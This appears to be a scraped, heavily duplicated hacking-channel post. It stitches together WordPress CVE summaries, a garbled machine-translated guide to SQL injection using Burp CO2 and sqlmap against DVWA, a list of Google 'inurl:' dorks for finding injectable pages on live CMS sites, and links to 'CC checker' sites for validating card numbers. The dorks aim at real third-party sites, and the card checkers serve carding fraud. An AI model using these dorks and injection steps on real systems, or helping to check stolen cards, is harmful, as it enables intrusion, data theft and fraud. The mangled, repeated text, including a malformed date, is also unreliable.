26) CVE-2017-1001000 2017-04-02 2019-10-02 5.0 None Remote Low Not required None Partial None
The register_routes function in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php in the REST API in WordPress 4.7.x before 4.7.2 does not require an integer identifier, which allows remote attackers to modify arbitrary pages via a request for wp-json/wp/v2/posts followed by a numeric value and a non-numeric value, as demonstrated by the wp-json/wp/v2/posts/123?id=123helloworld URI.
27) CVE-2017-1000600 20 Exec Code 2018-09-06 2018-10-26 6.5 None Remote Low Single system Partial Partial Partial
WordPress version <4.9 contains a CWE-20 Input Validation vulnerability in thumbnail processing that can result in remote code execution. This attack appears to be exploitable via thumbnail upload by an authenticated user and may require additional plugins in order to be exploited however this has not been confirmed at this time. This issue appears to have been partially, but not completely fixed in WordPress 4.9
28) CVE-2017-17091 330 Bypass 2017-12-02 2019-10-02 6.5 None Remote Low Single system Partial Partial Partial
wp-admin/user-new.php in WordPress before 4.9.1 sets the newbloguser key to a string that can be directly derived from the user ID, which allows remote attackers to bypass intended access restrictions by entering this string.
29) CVE-2017-16510 89 Sql 207-11-02 2018-02-03 7.5 None Remote Low Not required Partial Partial Partial
WordPress before 4.8.3 is affected by an issue where $wpdb->prepare() can create unexpected and unsafe queries leading to potential SQL injection (SQLi) in plugins and themes, as demonstrated by a "double prepare" approach, a different vulnerability than CVE-2017-14723.
30) CVE-2017-14990 312 Sql 2017-10-02 2019-10-02 4.0 None Remote Low Single system Partial None None
WordPress 4.8.2 stores cleartext wp_signups.activation_key values (but stores the analogous wp_users.user_activation_key values as hashes), which might make it easier for remote attackers to hijack unactivated user accounts by leveraging database read access (such as access gained through an unspecified SQL injection vulnerability).
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Before WordPress 4.9.5, the URL validator assumed URLs with the hostname localhost were on the same host as the WordPress server.
23) CVE-2018-10100 601 2018-04-16 2018-05-18 5.8 None Remote Medium Not required Partial Partial None
Before WordPress 4.9.5, the redirection URL for the login page was not validated or sanitized if forced to use HTTPS.
24) CVE-2018-6389 399 DoS 2018-02-06 2018-03-05 5.0 None Remote Low Not required None None Partial
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
25) CVE-2018-5776 79 XSS 2018-01-18 2018-02-01 4.3 None Remote Medium Not required None Partial None
WordPress before 4.9.2 has XSS in the Flash fallback files in MediaElement (under wp-includes/js/mediaelement).
26) CVE-2017-1001000 2017-04-02 2019-10-02 5.0 None Remote Low Not required None Partial None
The register_routes function in wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php in the REST API in WordPress 4.7.x before 4.7.2 does not require an integer identifier, which allows remote attackers to modify arbitrary pages via a request for wp-json/wp/v2/posts followed by a numeric value and a non-numeric value, as demonstrated by the wp-json/wp/v2/posts/123?id=123helloworld URI.
27) CVE-2017-1000600 20 Exec Code 2018-09-06 2018-10-26 6.5 None Remote Low Single system Partial Partial Partial
WordPress version <4.9 contains a CWE-20 Input Validation vulnerability in thumbnail processing that can result in remote code execution. This attack appears to be exploitable via thumbnail upload by an authenticated user and may require additional plugins in order to be exploited however this has not been confirmed at this time. This issue appears to have been partially, but not completely fixed in WordPress 4.9
28) CVE-2017-17091 330 Bypass 2017-12-02 2019-10-02 6.5 None Remote Low Single system Partial Partial Partial
wp-admin/user-new.php in WordPress before 4.9.1 sets the newbloguser key to a string that can be directly derived from the user ID, which allows remote attackers to bypass intended access restrictions by entering this string.
29) CVE-2017-16510 89 Sql 207-11-02 2018-02-03 7.5 None Remote Low Not required Partial Partial Partial
WordPress before 4.8.3 is affected by an issue where $wpdb->prepare() can create unexpected and unsafe queries leading to potential SQL injection (SQLi) in plugins and themes, as demonstrated by a "double prepare" approach, a different vulnerability than CVE-2017-14723.
30) CVE-2017-14990 312 Sql 2017-10-02 2019-10-02 4.0 None Remote Low Single system Partial None None
WordPress 4.8.2 stores cleartext wp_signups.activation_key values (but stores the analogous wp_users.user_activation_key values as hashes), which might make it easier for remote attackers to hijack unactivated user accounts by leveraging database read access (such as access gained through an unspecified SQL injection vulnerability).
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Infiltration tool combat: Sqlmap and Burp Suite for Sql injection attack (Burp CO2 plugin)
instagram.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Burp CO2 is an extension of the popular web proxy / web application testing tool called Burp Suite provided by Portswigger. Before installing the Burp CO2 extension, you must install Burp Suite.
2) The CO2 extension includes various functions to enhance certain web penetration testing tasks, such as a more efficient and error-free interface to interact with SQLMap, various tools for generating user lists, a Laudanum development shell implementation, and even a word masher is used to generate passwords.
π¦ how to get the sqlmap command through burp suit for SQL injection?
1) Start hiccup suit, click on the expansion tab, then click on the cans hiccup extension on the BAPP store to expand the hiccup ability.
Now select CO2 and click on the available button box on the right sideof the installation .
2) From a given increase in CO2 screenshot you can see the extension on the menu bar now click of CO2 , and then select SQLMappe R tool
3) Now open DVWA in your computer and log in with the following credentials:
username -admin
password -password
4) Click DVWA Security and set the website security level to low
Select SQL Injection from the list of vulnerabilities to attack Type the user ID in the text box : ' .
5) Do not set the browser proxy, please do not click the submit button. Set the browser proxy to make the burp suite work properly. Go to burp suite, click the agent in the menu bar , and then go to the button to intercept . Come back and click the submit button in dvwa .
6) The "Intercept" button is used to display HTTP and Web socket messages passed between the browser and the Web server. Now right-click on its window and you will see a list of many operations that have been opened, then select the option to send to SQLMapper .
7) When the acquired data is sent to sqlmapper, it will automatically generate a sqlmap command using referrer and cookie . Here you can see the option box at the end of the burp suite framework . Now, click on the tabs listed above and select the checkboxes database, table, column, username and password . Now copy the sqlmap command from the text field and use sqlmap to manually run this command on the terminal
8) Open the terminal and paste the above command in front of "sqlmap" Now run this command to get the database information
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Infiltration tool combat: Sqlmap and Burp Suite for Sql injection attack (Burp CO2 plugin)
instagram.com/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Burp CO2 is an extension of the popular web proxy / web application testing tool called Burp Suite provided by Portswigger. Before installing the Burp CO2 extension, you must install Burp Suite.
2) The CO2 extension includes various functions to enhance certain web penetration testing tasks, such as a more efficient and error-free interface to interact with SQLMap, various tools for generating user lists, a Laudanum development shell implementation, and even a word masher is used to generate passwords.
π¦ how to get the sqlmap command through burp suit for SQL injection?
1) Start hiccup suit, click on the expansion tab, then click on the cans hiccup extension on the BAPP store to expand the hiccup ability.
Now select CO2 and click on the available button box on the right sideof the installation .
2) From a given increase in CO2 screenshot you can see the extension on the menu bar now click of CO2 , and then select SQLMappe R tool
3) Now open DVWA in your computer and log in with the following credentials:
username -admin
password -password
4) Click DVWA Security and set the website security level to low
Select SQL Injection from the list of vulnerabilities to attack Type the user ID in the text box : ' .
5) Do not set the browser proxy, please do not click the submit button. Set the browser proxy to make the burp suite work properly. Go to burp suite, click the agent in the menu bar , and then go to the button to intercept . Come back and click the submit button in dvwa .
6) The "Intercept" button is used to display HTTP and Web socket messages passed between the browser and the Web server. Now right-click on its window and you will see a list of many operations that have been opened, then select the option to send to SQLMapper .
7) When the acquired data is sent to sqlmapper, it will automatically generate a sqlmap command using referrer and cookie . Here you can see the option box at the end of the burp suite framework . Now, click on the tabs listed above and select the checkboxes database, table, column, username and password . Now copy the sqlmap command from the text field and use sqlmap to manually run this command on the terminal
8) Open the terminal and paste the above command in front of "sqlmap" Now run this command to get the database information
Written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Oday Vulnerability Injection Comprehensive Utilization Tool can be set according to the module to be detected the back page:
1) dedecms default background page: / dede / add something else you can own, not too many
pages feature can be set to: <the INPUT of the type = "text" name = "userid"
2) ctscms default page background: / ctscms / can also add their own something else, not too many
pages feature can be set to: <input type = "text" name = "userid" because it is the same here dede kernel development
3) easy to want to buy back the default page: /admin.php can also add their own something else, not too many
pages feature can be set to: /verify.php "the above mentioned id =" the Verify "
Oday injection vulnerability keyword:
inurl: Article This article was.
inurl: coupon.php city = (Local Business with the word)?
4) phpweb default background page: / admin / add something else you can own, not too many
pages feature can be set to: Log </ title> This is not Ok, it seems that the changes are relatively large.
The address of phpweb must be a page (https: // xx / sfsfsfs) not a doman (https://test ...com), you can use the following keywords,
oday vulnerability injection keywords:
inurl: webmall / query.php? typeid = ?
inurl: shop / class /? 226.html
inurl: product / html /? 10.html
inurl: down / class /? 2.html
inurl: news / html /? 417.html
inurl: shop / html /? 477. HTML
inurl: News / class / 86.html?
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Oday Vulnerability Injection Comprehensive Utilization Tool can be set according to the module to be detected the back page:
1) dedecms default background page: / dede / add something else you can own, not too many
pages feature can be set to: <the INPUT of the type = "text" name = "userid"
2) ctscms default page background: / ctscms / can also add their own something else, not too many
pages feature can be set to: <input type = "text" name = "userid" because it is the same here dede kernel development
3) easy to want to buy back the default page: /admin.php can also add their own something else, not too many
pages feature can be set to: /verify.php "the above mentioned id =" the Verify "
Oday injection vulnerability keyword:
inurl: Article This article was.
inurl: coupon.php city = (Local Business with the word)?
4) phpweb default background page: / admin / add something else you can own, not too many
pages feature can be set to: Log </ title> This is not Ok, it seems that the changes are relatively large.
The address of phpweb must be a page (https: // xx / sfsfsfs) not a doman (https://test ...com), you can use the following keywords,
oday vulnerability injection keywords:
inurl: webmall / query.php? typeid = ?
inurl: shop / class /? 226.html
inurl: product / html /? 10.html
inurl: down / class /? 2.html
inurl: news / html /? 417.html
inurl: shop / html /? 477. HTML
inurl: News / class / 86.html?
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CC CHECKER WEBSITES :
t.me/UndercodeTesting
> https://checkz.net/
> https://bin-checker.net/
> https://codebeautify.org/credit-card-validate
> https://www.mobilefish.com/services/credit_card_number_checker/credit_card_number_checker.php
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CC CHECKER WEBSITES :
t.me/UndercodeTesting
> https://checkz.net/
> https://bin-checker.net/
> https://codebeautify.org/credit-card-validate
> https://www.mobilefish.com/services/credit_card_number_checker/credit_card_number_checker.php
β β β ο½ππ»βΊπ«Δπ¬πβ β β β